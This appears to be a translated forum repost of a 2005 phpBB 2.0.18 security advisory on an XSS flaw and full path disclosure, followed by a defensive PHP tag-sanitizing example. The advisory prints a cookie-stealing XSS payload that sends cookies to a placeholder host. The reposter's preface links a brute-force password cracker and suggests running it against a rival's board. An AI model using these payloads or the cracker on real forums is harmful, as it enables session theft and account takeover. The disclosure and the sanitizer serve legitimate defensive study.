phpBB Forum Program: Duddy Meet new problems _ vulnerability Research

Source: Internet
Author: User
phpBB 2.0.18 XSS and Full Path Disclosure

Details: SecurityAlert

There is also a brute-force cracking tool. It is single-threaded and of no great use; if a rival really has opened a phpBB board, it can also be used to run passwords.

Download: http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar
Topic: phpBB 2.0.18 XSS and Full Path Disclosure

SecurityAlert ID: 269

Security Risk: Low

Remote Exploit: Yes

Local Exploit: No

Exploit Given: Yes

Credit: Maksymilian Arciemowicz

Date: 17.12.2005

Affected Software: phpBB <= 2.0.18

Advisory Text:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.18 XSS and Full Path Disclosure cxib8o3.22]

Author: Maksymilian Arciemowicz (CXIB8O3)
Date: 16.12.2005
From the SecurityReason.com team

----0. Description---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board
package. phpBB has a user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL,
MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community
solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

----1. XSS---
If HTML tags are allowed ("ON") in phpBB, such as b, i, u, pre, and you have "Always allow
HTML: Yes" in your profile, or you are a Guest,

then you can use these tags:

<b c=">" onmouseover="alert('securityreason.com')" x="<b"> H E L O </b>

Exploit:

<b c=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" x="<b"> H A L O </b>

and you have the cookies.

----2. Full Path Disclosure---
In the file admin/admin_disallow.php is

- -25-31---
if (!empty($setmodules))
{
    $filename = basename(__FILE__);
    $module['Users']['disallow'] = append_sid($filename);

    return;
}
- -25-31---

The function append_sid() doesn't exist. And if you have:

register_globals = On
display_errors = On

Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

--result ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpbb2/admin/admin_disallow.php on line 28
--result ERROR---

----3. Greets---
sp3x

----4. Contact---
Author: Maksymilian Arciemowicz < Cxib8o3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/arciemowicz.maksymilian.gpg
SecurityReason.com Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

id8dbqfdpdtc3ke13x/fto4raoscajkbcyrnbhkdgeuwny1u/wxmhzdnvqcgl39d
/0u14en2sqah1bwu0yvt48q=
=lsl8
-----END PGP SIGNATURE-----

Oh, yes, as for the top one, I guess this is what it means:

Personality Signature:
The personalized signature you fill out is automatically attached at the bottom of your published article. A personality signature has a limit of 512 characters.

Prohibit HTML tags
Allow style labels
Allow expression icons

Look for the "Allow HTML tags" option.
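
The test string in section 1 of the advisory hides its event handler in attributes of an allowed tag, so a filter that only checks the tag name lets it through. The following is an added example, not code from the advisory or from phpBB: it escapes all markup first and restores only bare allow-listed tags. The function name render_limited_html and the sample inputs are assumptions made for illustration (PHP 7.4 or later).

```php
<?php
// Added example, not phpBB code. render_limited_html() is a hypothetical name.

/**
 * Escape all markup, then re-enable only bare allow-listed tags.
 * A tag carrying any attribute never matches, so it stays escaped.
 */
function render_limited_html(string $text, array $allowed = ['b', 'i', 'u', 'pre']): string
{
    // 1. Neutralise everything: <, >, & and both quote styles become entities.
    $safe = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');

    // 2. Restore only "<tag>" and "</tag>" with nothing else between the brackets.
    $names = implode('|', array_map(fn($t) => preg_quote($t, '#'), $allowed));
    return preg_replace_callback(
        '#&lt;(/?)(' . $names . ')&gt;#i',
        fn(array $m) => '<' . $m[1] . strtolower($m[2]) . '>',
        $safe
    );
}

// Constructed inputs: ordinary bold text next to a disallowed tag, and the
// advisory's alert() test string from section 1.
$samples = [
    'plain'    => '<b>hello</b> <script>x</script>',
    'advisory' => '<b c=">" onmouseover="alert(\'securityreason.com\')" x="<b"> H E L O </b>',
];

foreach ($samples as $label => $input) {
    $out = render_limited_html($input);
    echo $label, ': ', $out, PHP_EOL;

    // After removing the exact allow-listed tags, no raw "<" may remain.
    $residue = preg_replace('#</?(?:b|i|u|pre)>#', '', $out);
    if (strpos($residue, '<') !== false) {
        throw new RuntimeException("unescaped markup survived in sample '$label'");
    }
}
```

With the advisory's string, only the trailing `</b>` is restored; the opening tag and its attributes are rendered as literal text.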
